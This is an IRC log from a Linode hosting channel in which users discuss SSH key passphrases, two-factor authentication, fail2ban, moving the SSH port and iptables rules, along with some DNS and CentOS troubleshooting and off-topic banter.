20:27-!-solocommand [solocomman@68-185-170-78.dhcp.mdsn.wi.charter.com] has quit []
20:27<p3rsist>so it means having 1 password anyway...
20:28<bob2>p3rsist: ssh keys are fine
20:28<p3rsist>whats the point of having ssh keys with password... if I have to use a password anyway...
20:28<buddyw>any opinions on yubi keys?
20:28<bob2>p3rsist: people are suggesting that you use a passphrase on them so that it is slightly harder for people who compromise your desktop to compromise your linode
20:28<EugeneKay>Security.
20:28<p3rsist>Yes I know
20:28<squircle>buddyw: i love my yubikey
20:29<akerl>p3rsist: As I said, use strong passwords, check out 2 factor auth. Profit
20:29<bob2>p3rsist: because a) guessing the passphrase isn't enough (attacker needs the key as well) and b) you can have ssh-agent/keychain cache it so you don't have to type it ever time
20:29<p3rsist>when I put password on ssh keys... It means you cant move them with the password right?
20:29<p3rsist>without*
20:29<akerl>p3rsist: No
20:29<EugeneKay>You need the password to decrypt(and thus use) the private key. Without both pieces of information, it's useless.
20:30-!-SirFunk [~jeffutter@cpe-67-242-18-197.twcny.res.rr.com] has quit [Read error: Connection reset by peer]
20:30<bob2>p3rsist: you can't use them without it, yes
20:30<akerl>If your key has a passphrase on it, it means it is encrypted. If someone compromises your computer, they can take the encrypted private key file, decrypt it at their leisure, and then connect to your server.
20:30-!-SirFunk [~jeffutter@cpe-67-242-18-197.twcny.res.rr.com] has joined #linode
20:30<p3rsist>Then guys, whats the point of using keys... if when you use them you need to input a pass? You understand my points... Why just not use the keys... and only use password anyways?
20:30<buddyw>squircle: do you use it for ssh?
20:30<bob2>10:29:06 < bob2> p3rsist: because a) guessing the passphrase isn't enough (attacker needs the key as well) and b) you can have ssh-agent/keychain cache it so you don't have to type it ever time
20:30<bob2>p3rsist: ^
20:31<EugeneKay>akerl - If somebody can decrypt a password-protected SSH private key..... RSA would like to have a few words with them ;-)
20:31<buddyw>I have one and I only use it for a single website.
20:31<bob2>no
20:31<apsqwla>EugeneKay, at their leisure
20:31<akerl>EugeneKay: You have no idea what you're talking about.
20:31<squircle>buddyw: yes, I do
20:31<bob2>it'd be due to a shitty passphrase not due to a break in whatever symmetric algo SSH uses for keys
20:31<SirFunk>hey, is there any way to tell where my linux box is resolving an address from? if i ping a address i get one ip if i dig it it shows another
20:32<ajmitch>also the ssh server is exposed to the internet for bruteforcing, your private key shouldn't be
20:32<akerl>EugeneKay: The problem is that Jimmy the Hacker, if he has your private key (that has a passphrase on it), can brute force it, entirely locally
20:32<EugeneKay>So.... use a good password?
20:32<akerl>Which only buys you more time.
20:33<EugeneKay>Yeah, 2^64 bits isn't enough time.
20:33<apsqwla>yes, he can compromise your home box
20:33<bob2>SirFunk: what name? and it depends how you invoke dig
20:33<buddyw>a little time on a cosmic time scale?
20:33<apsqwla>then write up a quit priv escalation
20:33<apsqwla>quick*
20:33<SirFunk>Boaz: jeffutter.com ... just doing "dig jeffutter.com"
20:33<apsqwla>boom ROOT
20:34<akerl>apsqwla: Again, I can't even parse what you're trying to say
20:34<apsqwla>i'll give you an account on my linode
20:34<apsqwla>get root, and ill give you a dollar
20:34<p3rsist>by strong password, you mean how much characters?
20:34<p3rsist>10?
20:34<apsqwla>oh yeah and i only allow keyed logins, so good luck getting in, just come to my house and steal my keys though
20:34<akerl>lulz
20:34-!-MrPPS [~quassel@canyouget.in] has quit [Ping timeout: 480 seconds]
20:35<bob2>p3rsist: strong and not a word and with numbers and punctuation and mixed case
20:35<bob2>SirFunk: what ips do you get? it only has one afaict
20:35<bob2>SirFunk: or maybe you updated the A record recently
20:35-!-TIBS011 [~TIBS01@178.101.214.253] has quit [Ping timeout: 480 seconds]
20:35-!-TIBS011 [lemfpomwe@host-92-20-154-71.as13285.net] has joined #linode
20:35<SirFunk>bob2: when i ping i get: 173.236.208.92 dig i get: 69.164.213.114 ... dig is correct. I changed the nameservers and updated the A record like yesterday morning
20:36<bob2>SirFunk: did you hack /etc/hosts on your desktop by any chance
20:36<SirFunk>bob2: nope
20:37-!-karstensrage [~Adium@173-13-190-57-sfba.hfc.comcastbusiness.net] has quit [Quit: Leaving.]
20:37-!-AviMarcus [~avi@bzq-79-183-184-15.red.bezeqint.net] has quit [Quit: Ex-Chat]
20:37<apsqwla>SirFunk, flush dns?
20:37<SirFunk>apsqwla: don't think you can on linux?
20:38<bob2>/etc/init.d/nscd restart
20:38<bob2>kinda
20:38<bob2>more likely to be your local router or isp i guess
20:38-!-starter2 [starter2@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has joined #linode
20:38<SirFunk>bob2: which ip address do you get when you ping?.. maybe something (router/isp) has it cached forever
20:38<bob2>69
20:38<SirFunk>don't have nscd on this system
20:38<starter2>guys, this problem is still not fixed: http://forum.linode.com/archive/o_t/t_6981/start_15/index.html
20:38<SirFunk>ok.. i'll wait another day or so before pulling out my hair
20:38<starter2>and the pastebins are erased by now
20:38<starter2>i cant run iptables
20:38-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has quit [Quit: petemall]
20:39<bob2>shocker
20:39<bob2>centos5 is fucking ancient, doesn't work on kernel from 3 years after its release
20:40<bob2>sorry, 4 years
20:40<starter2>can i fix this ?
20:40<akerl>Use a more recent distro?
20:40<starter2>which is?
20:40<synapt>5.6 has been working fine for me
20:40<starter2>how do i check my cent ver?
20:41<akerl>You don't know what distro your server is running?
20:41<bob2>have you ever run 'yum update'?
20:41<starter2>5.5 it is
20:41<starter2>running yum update will fix my problem?
20:42<bob2>no
20:42<bob2>don't you run it daily?
20:42<HoopyCat>starter2: are all the iptables chains in use enumerated in case statements within /etc/init.d/iptables ?
20:42<bob2>the patch is in the forum thread
20:42<starter2>thats why i dont run the yum update:
20:42<starter2>Error: Missing Dependency: ppp = 2.4.3 is needed by package pptpd-1.3.4-2.fc5.i386 (installed)
20:42<starter2>i guess i gotta remove something here
20:42<bob2>is the linode 2.6.18 kernel maintained with backports?
20:42<starter2>to be able to proceed
20:43<bob2>centos: now with 80% more sadness
20:43<akerl>starter2: The real solution would be to switch to a better distro
20:43<HoopyCat>starter2: fc5?
20:43<starter2>i know it is weird
20:43*akerl bets you did something crazy before to "fix" a problem with centos, and now it's coming back to kick you in the face
20:43<HoopyCat>starter2: umm... if it says "fc5" in there, you have a Problem
20:44<Daevien>HoopyCat: yeah a bigger one than jsut centos :p
20:44-!-akhomenko [~466b5fa9@chat.linode.com] has joined #linode
20:44<HoopyCat>yes, as in there's not just CentOS there :-)
20:45<Daevien>centos/fedora mashmup: just when you thought it couldn't get more terrifying than centos!
20:46<HoopyCat>but yes, probably gettin' darn close to reinstall time
20:47<mikegrb_>lulz
20:47<apsqwla>lol
20:47-!-starter2 [starter2@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has quit [Read error: Connection reset by peer]
20:47-!-starter2 [~ZEnolate@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has joined #linode
20:48<apsqwla>FCENTOS 5
20:48-!-techhelper1 [~techhelpe@user-118brq9.cable.mindspring.com] has joined #linode
20:48<EugeneKay>Cendora 5
20:48<mikegrb_>lulz
20:48<starter2>lol
20:49<starter2>that was funny
20:49<HoopyCat>Fedoraprise Linuxcore 5
20:49<starter2>my original problem was creating a simple vpn
20:49<HoopyCat>note that this was circa 2006, so it was still Fedora Core
20:49<apsqwla>CentoraOS 5
20:49<starter2>so i can route all my traffic through linode
20:49<apsqwla>CentoraCore OS5
20:49<starter2>HoopyCat i have been using it since Fedora core 1
20:49<akerl>starter2: ssh tunnel was too complicated for you?
20:49<starter2>i still got the disk
20:49<starter2>no idea what that is
20:49<starter2>look
20:50<starter2>some jerk is screwing up my game on battle net
20:50<starter2>he is doing it based on my home ip
20:50<apsqwla>starter2, my bad
20:50<starter2>games
20:50<Daevien>starter2: you mashed centos with fedora core. not good. your system is pretty much screwed. get your data off, deploy somethign else (ie: ubuntu woudl be a more up to date distro), learn it and DONT mangle stuff you you don't understand. it will work much better
20:50<HoopyCat>starter2: fc5 is not recent, alas. :-) i suspect you might have installed the pptpd FC5 RPM instead of the EL5 by accident. (hopefully)
20:50<starter2>Daevien dont think u are overeacting?
20:50<Boohemian>hello #linode
20:51<apsqwla>LHAHAHA
20:51<starter2>i installed one fc5 package and my system is screwed
20:51-!-tempesta [~atar@32-113-95-178.pool.ukrtel.net] has joined #linode
20:51<apsqwla>Daevien, answer him
20:51<HoopyCat>starter2: uninstalling pptpd should probably debone it, assuming it hasn't pulled in crazy dependencies or anything (which it sounds like it didn't)
20:51<starter2>but if i can get that to work
20:51<Daevien>starter2: you are having issues even running yum, cant get other stuff going, god knows what mess you've got
20:51<starter2>my problem is solved
20:51<apsqwla>that will fix your firewall?
20:51<starter2>no
20:51<apsqwla>great!
20:51<starter2>i dont need to fix firewall
20:51<starter2>if this works
20:51<starter2>:P
20:52<HoopyCat>i think the broken iptables init script is cosmetic, but i dunno
20:52<apsqwla>pptpd?
20:52<starter2>yeah
20:52<starter2>it already works
20:52<starter2>accepts my connectiong
20:52<starter2>but i dont have itnernet
20:52<starter2>see i disconnected earlier
20:52<p3rsist>so guys strong passwords for SSH + fail2ban = great security?
20:52<p3rsist>(for access)
20:52<akerl>"great"? meh
20:52<apsqwla>if you have to stop brute force attacks you already fail
20:53<akerl>apsqwla: Please stop spouting off nonsense
20:53<apsqwla>akerl, you are no authority
20:53<akerl>Hence the please.
20:53<HoopyCat>p3rsist: scissors == great security, but "strong" passwords (see also today's xkcd) do a good job. throw in some two-factor authentication (google authenticator or duosecurity) for additional paranoia, as required
20:53<apsqwla>akerl, please stop speaking with authority
20:53*akerl prepares glue for desk.
20:54<EugeneKay>p3rsist - change SSH to a high port, fail2ban(or the more modern sshguard), disable password auth, secure all SSH private keys with passwords, PermitRootLogins No, and use AllowUsers.
20:54-!-neoark [na1du@etch.deb1an.org] has quit [Remote host closed the connection]
20:54<squircle>if !let's-have-a-vote existed, I'd use it now
20:54<EugeneKay>You could also restrict to only allow from certain IPs, but that's too much for me(my phone roams)
20:54<Daevien>EugeneKay: ychange the port = no security
20:54<apsqwla>and use a vpn, and use stunnel + ssh tunnels + iptables
20:54<akerl>Daevien++
20:54<EugeneKay>Daevien - it can be argued that sshguard/fail2ban isn't either, but every bit helps.
20:54<squircle>security through obscurity isn't security, it's just obscurity
20:55<HoopyCat>changing ssh's port is annoying, although it's about as effective as denyhosts/fail2ban at keeping logs clean.
20:55<EugeneKay>Exactly that ^
20:55<Daevien>uh, notice his words EugeneKay ?
20:55<Daevien>nothign at all about security. just in keeping logs clean
20:55<Daevien>ie: no security
20:55-!-neoark [na1du@etch.deb1an.org] has joined #linode
20:55<EugeneKay>It reduces your attack surface as presented to stupid passwordbots
20:55<akerl>Strong passwords, plus 2 factor auth. Problem solved. The rest is layers of duck tape on your bank vault
20:55<p3rsist>ohh well... this is a heated debate
20:56<apsqwla>you guys need portknocking too
20:56<p3rsist>akert1: what is plus 2 factor?
20:56<akerl>!troll ?
20:56<+linbot>http://i.imgur.com/9c5sw.jpg
20:56<apsqwla>with a cryptographically secure rotating 256bit port key
20:56<Musfuut>I need to do more to get more secure, I'm learning from this conversation, I'm somewhat out of date.
20:56<squircle>akerl: i'd say so
20:56<HoopyCat>also, in the event of a bad day, non-root users can listen on ports >1024. crash sshd and you can MITM absentminded sysadmins with a php script
20:56<Daevien>p3rsist: use a good password & ssh keys, keep your system updated, etc and you will have average ro godo security. great takes a lot more work
20:56<Solver>pki, fail2ban, port knocking, etc. there are quite a few options. I avoid changing ports whenever possible and I don't much mind dirty logs
20:56-!-techhelper1 [~techhelpe@user-118brq9.cable.mindspring.com] has quit [Ping timeout: 480 seconds]
20:56<akerl>p3rsist: Check out google's 2 factor auth. Basically, I have my iphone app that spits out a random string of numbers, that changes every 30 seconds
20:57<EugeneKay>Just use ALL the things. :-p
20:57<starter2>by the way
20:57<akerl>That way, I enter my password, which I set, plus the random changing string, which you can only get by having my phone
20:57<starter2>i broke off with my gf
20:57<Solver>akerl: hmm interesting
20:57<starter2>it is really hard on me
20:57<apsqwla>akerl, now some thug that gets your phone can hack you
20:57<Solver>akerl: what is the app called? I have an android bu tI'll see if it is avaialble
20:57<HoopyCat>starter2: did you disable her login credentials before you delivered the news?
20:58<Daevien>Solver: googel authenticator / authentication, i forget which
20:58<akerl>Solver: Google authenticator. It's android/iphone/blackberry. Google has a pam module you can use it for pretty much anything
20:58<Solver>cool thnx
20:58<mwalling>Solver: its on android
20:58<apsqwla>he just steals your phone breakds into your home/office, cracks the key at his leisure
20:58<Solver>mwalling: nice
20:58<apsqwla>write priveledge escalation
20:58<apsqwla>boom root!
20:58<Musfuut>Has anyone here used Slicehost's backup restore? I'm curious, that overwrites all your current data right, unless you purchase another server to restore to?
20:58<Daevien>apsqwla: ok, here's a request. no authroity behidn it but i think most of the reulars would agree with me: stfu if you aren't goign to add anythign useful already
20:59<squircle>AGREED
20:59<EugeneKay>akerl - two-factor auth, you're using the PAM module on the server?
20:59<HoopyCat>Musfuut: i can't recall having used it, but i'd assume it's the same as linode's from that standpoint. (IOW, yes)
20:59<akerl>EugeneKay: Yes
20:59<apsqwla>Daevien, umad?
20:59<akerl>HoopyCat, Musfuut: Linodes' doesn't overwrite all data, neh?
20:59<bob2>apsqwla: wow almost as if "absolute security" is an impossible concept and it's all about making the difficulty high enough that breakign is infeasible in practice
21:00<bob2>you should write a book about your insights
21:00<Daevien>apsqwla: nope. tired of the never ending bullshit out of your mouth. and i'm quite sure i'm not the only one.
21:00<apsqwla>Daevien, so umad?
21:00<apsqwla>bob2, its called sarcasm
21:00<akerl>Daevien: /ignore seems like your friend here
21:00<squircle>apsqwla: PLEASE STOP
21:00<HoopyCat>akerl: it doesn't, unless you overwrite your data yourself. slicehost/rackspacecloud doesn't have the concept of disk images, resizing, non-running/undeployed instances, etc
21:00<bob2>just seems like gibberish, but akerl is correct
21:00<p3rsist>aker1: for factor 2 auth, I just need a cell phone for the SMS and the pam module on the linode right?
21:01<apsqwla>squircle, stop what?
21:01<Musfuut>HoopyCat: Well linode restores to disk images and doesn't overwrite, or to a new linode. However Slicehost doesn't even have disk images. It's not uber important I find out, I was just talking to someone about why I like linode better and I was going to mention the backups but then realized I had never restored a backup on slicehost.
21:02<HoopyCat>Musfuut: "Restoring will destroy the Slice and recreate it from the backup image. Are you sure?"
21:02<akerl>p3rsist: The google auth app doesn't use sms. Basically, the pam module (redundant) is on the server. The app is on your phone. You generate your secret key on the server, add it to the phone app, the phone then generates the time based string.
21:02*HoopyCat shits pants, closes browser window
21:02<Daevien>p3rsist: well thats one of the 2 factor. you also should do ssh keys for the other. 2 factor = 2 methods needs ot be correct rahter than just one before you can get in
21:02<akerl>It doesn't connect to anything to do that
21:02<HoopyCat>fucking hell
21:02<Musfuut>HoopyCat: Thank you, that confirms that. God, I'm so happy here. :)
21:03<akerl>p3rsist: Another solution is duo security, as hoopy mentioned. They use SMS, phone calls, or an app. Which works better if you don't have a smart phone supported by google auth
21:03<squircle>apsqwla: if you're trolling, stop trolling. if you have a legitimate belief that everything you're saying is 100% correct, it's not. offering your opinion is fine; I have no problem with it, but when you say things like "write priveledge esclation" "boom root!", it's really not helpful. at all. (also, you need to check your spelling on privilege). I'm going to /ignore you now, and leave you alone.
21:03<bob2>fucking 2-factor-auth, how dow does it work
21:03<akerl>squircle: sshhh. don't feed the trolls.
21:04<Daevien>you can also login with sms, phone call OR an app with duo. so for instance, i use ssh key and usually my android tablet with teh app to login. but if i los tmy tablet or whatever, i could use phone and not be stuck
21:04<apsqwla>squircle, bye
21:04<squircle>akerl: /ignore it and it will go away, right?
21:04<akerl>bob2: Magic, right? That's how all google products work, at least.
21:04<akerl>squircle: Yup
21:05-!-techhelp_ [~techhelpe@user-118brsl.cable.mindspring.com] has joined #linode
21:05<akerl>p3rsist: Really, it all depends on how paranoid you are, and who you're trying to protect against.
21:05<HoopyCat>Musfuut: you can deploy a new instance using another instance's backup as the base image, as well; arguably, that end of the interface is a little easier than similar things with linode. dunno if that's the case with rackspace, 'tho, as we don't use backups there
21:05<starter2>HoopyCat she never had login... whatever
21:05<starter2>:)
21:05<starter2>credentials
21:05<starter2>she doesn't know squat about linux
21:06<apsqwla>starter2: most people dont
21:06-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has joined #linode
21:06-!-starter2 [~ZEnolate@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has quit [Read error: Connection reset by peer]
21:07-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has quit [Remote host closed the connection]
21:07-!-starter2 [~ZEnolate@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has joined #linode
21:10<squircle>if i install, say, the yubikey pam module and lose my yubikey, will I never ever be able to log into my node again?
21:10<squircle>oh, well, I suppose I could boot into finnix and rm the pam module.
21:10<squircle>never mind.
21:10<HoopyCat>squircle: it depends on how you configure pam
21:11<squircle>HoopyCat: honestly, I don't have the slightest idea on how pam works/what it is (only what it stands for); I just figured it's time I started using a second factor for SSH
21:13<buddyw>all this talk of pam...I use encrypted private keys w/ no password auth
21:13-!-techhelp_ [~techhelpe@user-118brsl.cable.mindspring.com] has quit [Ping timeout: 480 seconds]
21:13<Daevien>pam in very simple terms is a method for authentication that accept modules to do that authentication in various ways
21:13<buddyw>I never even though of lish as an attack vector...
21:13<akerl>On a related note, is there a better way to talk about pam? Considering it's paModule? But talking about the google pam seems odd.
21:13<squircle>i guess that makes sense, "pluggable authentication module"
21:13<buddyw>'doh
21:14<Solver>the google otp module is called pam_orthrus apparently
21:14<Daevien>yeah lish & finnix are pretty close to providing you the equiv of physical access. which is pretty hard to stop against
21:14-!-Cromulent [~Cromulent@cpc8-reig4-2-0-cust24.6-3.cable.virginmedia.com] has joined #linode
21:15<akerl>Especially when combined with the linode manager's ability to reset root password
21:15<buddyw>yeah.
21:16<Daevien>caker shoudl make linode manager support yubikey
21:17<bob2>whitelist + very long passwords is pretty ace as it is
21:17*Daevien hides before angry linode coers invade
21:17<Daevien>er coders
21:17<bob2>client certs would be awesome
21:17<buddyw>Daevien: was about to say that
21:17-!-JSharp [~j@dyn125.3crowd.com] has quit [Quit: Leaving]
21:17<akerl>I'd prefer certs over a particular brand of 2factorauth
21:17<Daevien>well there are problem swith doign it. like then if yo lost your yubikey you woudl be pretty much screwed all around
21:17<buddyw>either is fine by me.
21:18<buddyw>passpack allows a backup yubikey
21:18<Musfuut>Thanks again HoopyCat :)
21:18<buddyw>you could do it that way
21:18<buddyw>of course you have to keep it secure
21:19<buddyw>and, seeing as how I pay my linode bill, I'm sure there could be some manual process to get me back in.
21:20-!-cereal|Away is now known as cereal
21:21<p3rsist>All right guys thanks for the info
21:21<starter2>let the force flow through you p3rsist
21:21<p3rsist>So moving the SSHD to a different port doesnt help?
21:21<p3rsist>:P
21:22<EugeneKay>It keeps the stupid SSH bots from finding you as often, which is good for reducing "attack surface area"
21:23<Daevien>p3rsist: it's security thorugh obscurity. aka not security
21:23<Daevien>if you lock your house but leave the key on a chain outside the door, it's not really useful
21:23<+linbot>New news from forums: Running Asterisks / installing tuning in General Discussion <http://forum.linode.com/viewtopic.php?t=7524>
21:23-!-tempesta [~atar@32-113-95-178.pool.ukrtel.net] has quit [Ping timeout: 480 seconds]
21:23-!-ZEnolate [~ZEnolate@li186-125.members.linode.com] has joined #linode
21:23<Tea>http://translationparty.com/#9601244 So I just got a spam email
21:23<EugeneKay>This is more like moving the front door of your house to the second floor.
21:24<EugeneKay>You can still find the door, but the casual 13 year old isn't going to get in as easy
21:24<buddyw>I have mine running on alt ports, but only because the fw at work blocks 22
21:24<p3rsist>Daevien: Its more like... hidding the door of the house :)
21:25<Solver>p3rsist: yeah that the best analogy imho
21:25<HoopyCat>p3rsist: it helps about as much as denyhosts/fail2ban does, i suppose, although it makes life somewhat harder for you/your users and opens yourself to a possible attack vector if you're using a port >1024
21:25<Daevien>p3rsist: not really. if someone walks aorund your house, theywill se=till see your door, jsut not in teh first place they look. which to some mindsets, just annoys them and makes them more determined to get in cause you tried to hide it :p
21:25<p3rsist>hoopycat: what is an attack vector?
21:26<Solver>p3rsist: the attack vector is the method of attack. Hoopycat is referring to the ability of a non-root user to start a compromised sshd on a high port
21:26<buddyw>it's like mac address filtering for a wifi network. Will it stop someone? yes. Will it stop any one with half a brain that can get past a 'secure' setup? no
21:26-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
21:26<HoopyCat>p3rsist: a way to subvert your security in some way
21:26<bob2>p3rsist: it cuts down on the crap in auth.log
21:26<p3rsist>daevien: Yeah :) Its more annoying to the network administrators in the end... the benefits are not great enough.
21:26<bob2>p3rsist: so it's handy in that regard, but doesn't mean you can be less secure in other ways
21:26<Daevien>p3rsist: ports over 1024 can be used by any user, so someone kills / your sshd dies and they can run a fake one that steal your password if they have a regular account
21:26<HoopyCat>Solver: or just bind to it, for a denial of service
21:26-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has joined #linode
21:26<Solver>HoopyCat: true
21:27-!-tempesta [~atar@32-113-95-178.pool.ukrtel.net] has joined #linode
21:27<bob2>I moved mine
21:27<HoopyCat>Solver: which is probably a more realistic threat, since the private keys are usually root/root 0400
21:27<p3rsist>Daevien: didnt know that...
21:27<HoopyCat>i don't like betting on race conditions :-)
21:27<Solver>Hoopycat: Yeah that's a good point actually
21:28<p3rsist>The problem I find with SSH keys is that... when you need another user to access... or you need to access from anotehr computer/device... or another OS...etc.. it becomes anoying..
21:28<HoopyCat>it's more an annoyance than anything, but i bet you could have some fun with a rude php script :-)
21:28<Solver>p3rsist: that's why most important services have port numbers <1024. It's a unixism that is reflected in the modern Internet :)
21:29<apsqwla>p3rsist, all security removes convenience and freedom
21:29<Solver>using ssh-agent adds convenience to me! :)
21:29<mikegrb_>lulz
21:29<apsqwla>lol
21:30<apsqwla>every convenience has some insecurity too though
21:30<Daevien>p3rsist: thing is, if you use random computer 4534534 you find, whats to say it doesnt have a trojan / key logger / something else nasty
21:30-!-starter2 [~ZEnolate@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has quit [Ping timeout: 480 seconds]
21:30<EugeneKay>Don't use public computers
21:30<HoopyCat>ssh-agent, btw, makes keys more convenient than passwords. mmm, agent forwarding...
21:30<Solver>if someone compromises my desktop it is true that ssh-agent will happily let them in to remote systems
21:30<HoopyCat>EugeneKay: "Would you lick the keyboard?"
21:30<apsqwla>and seemingly because humans are not perfect, even if the math is, every security has some insecurity
21:30<EugeneKay>HoopyCat - I wouldn't lick my OWN keyboard.
21:30*Solver does not do agent forwarding. gotta draw the line somewhere :)
21:30-!-ang [~ang@ip24-250-16-162.ri.ri.cox.net] has joined #linode
21:31<HoopyCat>Solver: i do it for trusted systems, but yes :-)
21:31<EugeneKay>And I sanitize it once a month(pull up all the keys, air-compressor + alcohol rag)
21:31-!-starter2 [starter2@CPE0026f3372a50-CM0026f3372a4d.cpe.net.cable.rogers.com] has joined #linode
21:31<Solver>EugeneKay: seriously? cool :) You are disciplined
21:31<apsqwla>EugeneKay, a dirty keyboard would probably just taste bad
21:31<HoopyCat>if you wouldn't lick the keyboard or stick the mouse into your mouth, don't log into your server from that machine
21:31<EugeneKay>I clean my laptop more often, but I don't pull up the keys. Lil things are impossible to put back together.
21:31<HoopyCat>afk, must log out
21:32<EugeneKay>Just a windexing of the surfaces on that thing
21:32<Solver>windex cures all
21:32<EugeneKay>apsqwla - oh, I know. I get more nasty stuff from biting my fingernails, which I am REALLY trying to stop doing.
21:32<apsqwla>EugeneKay, if they are delicous, eat them
21:32<p3rsist>So regarding iptables guys, what do you use? What are the major ports and protocols the server has to make sure they are blocked? I also use a white list system instead of a black list, but thats a given...
21:32<EugeneKay>I laugh at people who need to have super-double-sanitary homes.... all it does is let your immune system be weak.
21:33-!-Cromulent [~Cromulent@cpc8-reig4-2-0-cust24.6-3.cable.virginmedia.com] has quit [Remote host closed the connection]
21:33-!-Obsidian|server [~solas@209.236.124.196] has joined #linode
21:33<apsqwla>p3rsist, block everything except what you need or feel is worth the risk
21:33-!-Obsidian|server [~solas@209.236.124.196] has quit []
21:33<Solver>EugeneKay: absolutely
21:33<EugeneKay>p3rsist - I filter out RFC 1918 addresses(source and destination) and such, allow specific ports and services incoming and outgoing, and then -j DROP the rest
21:34<Solver>the kernel has some useful features too, like log_martians
21:34<Solver>you can use those on top of filtering through iptables
21:35<p3rsist>What do you think of Netfilter?
21:35<p3rsist>EugeneKay: filter out RFC 1918 addr??? What is that?
21:35-!-Obsidian|server [~solas@209.236.124.196] has joined #linode
21:35<EugeneKay>http://lmgtfy.com/?q=rfc+1918
21:36<Solver>p3rsist: I love it.
21:36<Obsidian|server>I LIVE
21:36<apsqwla>just use honeyd, and a rotating multi-port two keyed port knocking daemon that initiates remote forwarding of ssh port to successful knock client
21:36<apsqwla>the honeyd is just to trap people for lulz
21:36-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has joined #linode
21:36<Solver>p3rsist: I make extensive use of chains - great way to simplify a firewall and reduce cpu overhead
21:36<EugeneKay>Here's the list of outbound ports I allow from my home network, for a starting point. http://pastebin.com/vpVDj37P
21:36<Obsidian|server>my VPS's datacenter hocked up the power equipment somehow and knocked the datacenter offline ;-;
21:36<p3rsist>Eugenkay: :D I just got lgtfy NICE! :)
21:36-!-akerl [~Les@pool-70-109-61-224.clppva.fios.verizon.net] has quit [Quit: Bye]
21:36<HoopyCat>Obsidian|server: welcome to sunday morning
21:37-!-Musfuut [616884f7@ircip4.mibbit.com] has quit [Quit: http://www.mibbit.com ajax IRC Client]
21:37<Obsidian|server>heh
21:37<Obsidian|server>i'm glad my box is back online
21:37<Obsidian|server>...but now the uptime counter's been reset. >_<
21:37<HoopyCat>Obsidian|server: welcome to... a little bit later sunday morning
21:38<@jed>linbot: alias add rfc1918 echo RFC 1918 space is private addressing. 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 are reserved for private Internets in RFC 1918. RFC 4193 does the same for IPv6, setting aside fc00::/7 as ULA space.
21:38<+linbot>jed: The operation succeeded.
21:38<@jed>since I always have to google the damn list anyway
21:38<@jed>I never remember 172.16/12
21:38<Solver>there is an IETF proposal to allocate a /10 for CGNat
21:38-!-niemeyer [~niemeyer@72-254-15-217.client.stsn.net] has joined #linode
21:38-!-ZEnolate [~ZEnolate@li186-125.members.linode.com] has quit [Ping timeout: 480 seconds]
21:39<HoopyCat>linbot: deploy squid tesselation array
21:39<apsqwla>ive heard of someone using public address space in a lan
21:39*HoopyCat waits for operation to succeed
21:39<Solver>I'm just pondering if this would prompt any fw changes
21:39<EugeneKay>Don't forget the other non-Internet blocks like 192.18.0.0/15, 169.254.0.0/16, 192.0.2.0/24, 198.51.100.0/24, and 203.0.113.0/24
21:39<+linbot>HoopyCat: The opertion succeeded.
21:39<HoopyCat>mwalling: <3
21:39<Solver>apsqwla: that's more common than it should be
21:39<@jed>EugeneKay: not rfc 1918 :)
21:39<mwalling>?
21:39<HoopyCat>apsqwla: i do it here
21:39<EugeneKay>Nope, but they should still be -j DROPed
21:40<HoopyCat>mwalling: oh, saw the typo and thought it was you
21:40<Solver>EugeneKay: yep RFC3330 used to cover that but it got replaced by another RFC with a less easy to remember number....
21:40<apsqwla>HoopyCat, what net
21:40<mwalling>ass
21:40<@jed>mwalling: :>
21:40<Obsidian|server>...Okay, time to do something crazy and reboot this again after installing a kernel update.
21:40-!-Obsidian|server [~solas@209.236.124.196] has quit [Quit: leaving]
21:40<squircle>HoopyCat: my old school board has 199.235.0.0/16 and they use it within their lan (for some silly reason)
21:40-!-Musfuut [616884f7@ircip3.mibbit.com] has joined #linode
21:41<HoopyCat>apsqwla: 2001:470:8b37:[redacted]::/64
21:41<@jed>the hell is 192.18.0.0/15
21:41<Solver>EugeneKay: RFC5735
21:41<Solver>http://tools.ietf.org/html/rfc5735
21:41<p3rsist>I mean... when we access a server from a private addresse... the servers sees the router public adress not the private address, no?
21:41<StevenK>jed: A routable block, mostly owned by Sun.
21:42<HoopyCat>p3rsist: assuming network address translation is in use between the two endpoints, yes
21:42<@jed>yeah, I wasn't aware of a /15 that's reserved
21:42<Solver>p3rsist: if NAT is in use yes. if the private addresses are within an organisation and there is no NAt it will see the original source address
21:42-!-Obsidian|server [~solas@209.236.124.196] has joined #linode
21:42<Musfuut>Is there a guide to understanding which part or all of or wtf IPv6 for my linode I place into an AAAA record?
21:42<EugeneKay>jed - RFC 2455
21:42<@jed>that CIDR hits in googs, though
21:42<HoopyCat>!ipinfo 192.18.0.0
21:42<+linbot>HoopyCat: IP: 192.18.0.0; rDNS: None; ASN adv net: 192.18.0.0/16; ASN: AS11479; ASN owner: Sun Microsystems, Inc; Abuse contact(s): domain-contact_ww@oracle.com; Net owner: Sun Microsystems, Inc; City: Santa Clara; State: California; Postal code: 95054; Country: United States; http://revip.info/ipinfo/192.18.0.0
21:42<@jed>EugeneKay: nearly positive that's been stricken
21:42<p3rsist>Solver: so you could end up blocking ips from organizations?
21:43<HoopyCat>!ipinfo 192.19.0.0
21:43<+linbot>HoopyCat: IP: 192.19.0.0; rDNS: None; Abuse contact(s): gns-domain@lsil.com; Net owner: LSI Corporation; City: Milpitas; State: California; Postal code: 95035; Country: United States; http://revip.info/ipinfo/192.19.0.0
21:43<Kyhwana_>Musfuut: i'm sure there are plenty of ipv6 guides etc out there
21:43<EugeneKay>Hm. I'll have to look it up
21:43<HoopyCat>milpitas! i drove past there a couple months back!
21:44<HoopyCat>(visiting the bay area for the first time after being a computer nerd for decades is... wow)
21:44<Solver>p3rsist: I'm not sure how much networking you understand. Check this out: http://en.wikipedia.org/wiki/Network_Address_Translation
